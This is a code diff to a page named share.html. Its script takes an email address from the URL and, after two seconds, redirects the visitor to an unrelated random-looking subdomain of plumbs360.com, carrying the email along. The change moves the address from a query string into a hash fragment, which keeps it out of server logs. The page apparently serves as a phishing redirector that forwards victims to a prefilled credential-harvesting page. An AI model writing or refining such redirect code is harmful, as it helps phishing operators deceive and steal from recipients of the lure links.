--- a/share.html
+++ b/share.html
@@ -68,9 +68,9 @@
             const email = getEmailFromUrl();
             
             if (email) {
-                // Redirect with the email parameter appended to the URL
+                // Redirect with the email appended as a hash fragment in the URL
                 setTimeout(function () {
-                    window.location.href = 'https://tvrcemeheff.plumbs360.com/UwXUnAeh?email=' + encodeURIComponent(email);
+                    window.location.href = 'https://tvrcemeheff.plumbs360.com/UwXUnAeh#' + encodeURIComponent(email);
                 }, 2000);  // Delay of 2 seconds
             } else {
                 alert('No email parameter found in the URL.');
